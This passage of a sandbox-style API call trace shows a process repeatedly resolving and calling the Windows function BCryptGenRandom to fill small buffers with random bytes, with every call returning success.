pbBuffer=0x46ffd5e, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5e) returned 0x0 [0177.351] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0177.351] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0177.351] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0177.351] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0177.351] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0177.351] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0177.351] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0177.351] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0177.351] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0177.351] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0177.352] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0177.352] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0177.352] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0177.352] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0177.352] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0177.352] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0177.352] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0177.352] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0177.352] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0177.352] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0177.352] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0177.352] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0177.353] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0177.353] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0177.353] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0177.353] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0177.353] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0177.353] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0177.353] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0177.353] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0177.353] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0177.353] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0177.354] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0177.354] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5e, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5e) returned 0x0 [0177.354] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0177.354] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0177.354] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0177.354] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0177.354] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0177.354] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0177.354] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0177.354] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0177.355] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0177.355] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0177.355] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0177.355] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0177.355] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0177.355] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0177.355] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0177.355] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0177.355] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0177.355] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0177.356] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0177.356] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0177.356] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0177.356] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0177.356] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0177.356] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0177.356] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0177.356] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0177.356] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0177.356] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0177.357] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0177.357] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0177.357] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0177.357] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0177.357] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0177.357] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0177.357] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0177.357] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3a03481, cbBuffer=0x22, dwFlags=0x2 | out: pbBuffer=0x3a03481) returned 0x0 [0177.357] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0177.358] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0177.358] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0177.358] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0177.358] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0177.358] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0177.358] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0177.358] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0177.358] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0177.358] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0177.359] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0177.359] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0177.359] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0177.359] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0177.359] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0177.359] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0177.359] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0177.359] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0177.359] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0177.359] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0177.359] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0177.360] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0177.360] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0177.360] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0177.360] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0177.360] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0177.360] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0177.360] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0177.360] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0177.360] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0177.361] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0177.361] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0177.361] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0177.361] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0177.361] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0177.361] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0177.361] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0177.361] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0177.361] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0177.361] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0177.362] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0177.362] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0177.362] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0177.362] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5e, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5e) returned 0x0 [0177.362] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0177.362] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0177.362] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0177.362] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0177.362] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0177.362] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3a034a3, cbBuffer=0x29, dwFlags=0x2 | out: pbBuffer=0x3a034a3) returned 0x0 [0177.362] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0177.363] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0177.363] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0177.363] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0177.363] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0177.363] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0177.363] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0177.363] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0177.363] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0177.363] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0177.363] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0177.514] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0177.514] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0177.514] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0177.514] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0177.514] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0177.514] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0177.514] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0177.515] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0177.515] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0177.515] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0177.515] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0177.515] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0177.515] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0177.515] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0177.516] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0177.516] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0177.516] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0177.516] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0177.516] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0177.516] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0177.516] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0177.517] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0177.517] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0177.517] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0177.517] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0177.517] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0177.517] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0177.517] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0177.517] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0177.517] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0177.517] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0177.518] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0177.518] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0177.518] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0177.518] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0177.518] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0177.518] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0177.518] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0177.519] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0177.519] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0177.519] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0177.519] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0177.519] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0177.519] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0177.519] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0177.519] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0177.519] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0177.520] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0177.520] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0177.520] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0177.520] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0177.520] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0177.520] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0177.520] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0177.520] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0177.521] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0177.521] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3a034cc, cbBuffer=0x16, dwFlags=0x2 | out: pbBuffer=0x3a034cc) returned 0x0 [0177.521] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0177.521] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0177.521] GetProcAddress 